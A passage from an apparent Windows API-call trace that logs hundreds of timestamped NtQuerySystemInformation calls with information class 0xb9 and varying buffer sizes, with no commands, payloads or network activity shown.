Length=0x0, ResultLength=0x0) [0227.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0227.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x28, ResultLength=0x0) [0227.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x38, ResultLength=0x0) [0227.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x28, ResultLength=0x0) [0227.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x28, ResultLength=0x0) [0227.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf10, Length=0x20, ResultLength=0x0) [0227.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce90, Length=0x20, ResultLength=0x0) [0227.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce90, Length=0x20, ResultLength=0x0) [0227.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce90, Length=0x20, ResultLength=0x0) [0227.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x38, ResultLength=0x0) [0227.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x38, ResultLength=0x0) [0227.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfd0, Length=0x20, ResultLength=0x0) [0227.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0227.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0227.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x58, ResultLength=0x0) [0227.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x38, ResultLength=0x0) [0227.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0227.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0227.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0227.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0227.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x28, ResultLength=0x0) [0227.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x38, ResultLength=0x0) [0227.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x28, ResultLength=0x0) [0227.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x28, ResultLength=0x0) [0227.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x38, ResultLength=0x0) [0227.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfd0, Length=0x20, ResultLength=0x0) [0227.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x20, ResultLength=0x0) [0227.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x20, ResultLength=0x0) [0227.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x20, ResultLength=0x0) [0227.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x38, ResultLength=0x0) [0227.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfd0, Length=0x20, ResultLength=0x0) [0227.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0227.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0227.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x58, ResultLength=0x0) [0227.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x38, ResultLength=0x0) [0227.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x28, ResultLength=0x0) [0227.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x28, ResultLength=0x0) [0227.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x28, ResultLength=0x0) [0227.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x28, ResultLength=0x0) [0227.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfc0, Length=0x28, ResultLength=0x0) [0227.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x38, ResultLength=0x0) [0227.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x38, ResultLength=0x0) [0227.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x28, ResultLength=0x0) [0227.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x28, ResultLength=0x0) [0227.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x38, ResultLength=0x0) [0227.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x38, ResultLength=0x0) [0227.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fceb0, Length=0x20, ResultLength=0x0) [0227.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce30, Length=0x20, ResultLength=0x0) [0227.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce30, Length=0x20, ResultLength=0x0) [0227.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce30, Length=0x20, ResultLength=0x0) [0227.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x20, ResultLength=0x0) [0227.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x38, ResultLength=0x0) [0227.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x20, ResultLength=0x0) [0227.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf20, Length=0x20, ResultLength=0x0) [0227.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf20, Length=0x20, ResultLength=0x0) [0227.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf20, Length=0x20, ResultLength=0x0) [0227.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x38, ResultLength=0x0) [0227.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x20, ResultLength=0x0) [0227.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf20, Length=0x20, ResultLength=0x0) [0227.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf20, Length=0x20, ResultLength=0x0) [0227.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf20, Length=0x20, ResultLength=0x0) [0227.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x38, ResultLength=0x0) [0227.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x20, ResultLength=0x0) [0227.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0227.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0227.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd498, Length=0x50, ResultLength=0x0) [0227.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x38, ResultLength=0x0) [0227.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x28, ResultLength=0x0) [0227.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x28, ResultLength=0x0) [0227.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x28, ResultLength=0x0) [0227.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x28, ResultLength=0x0) [0227.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd260, Length=0x28, ResultLength=0x0) [0227.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x38, ResultLength=0x0) [0227.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2e0, Length=0x28, ResultLength=0x0) [0227.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2e0, Length=0x28, ResultLength=0x0) [0227.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x38, ResultLength=0x0) [0227.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x20, ResultLength=0x0) [0227.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1c0, Length=0x20, ResultLength=0x0) [0227.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1c0, Length=0x20, ResultLength=0x0) [0227.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1c0, Length=0x20, ResultLength=0x0) [0227.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x38, ResultLength=0x0) [0227.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x20, ResultLength=0x0) [0227.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0227.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0227.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x50, ResultLength=0x0) [0227.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x38, ResultLength=0x0) [0227.255] NtQuerySystemInformation 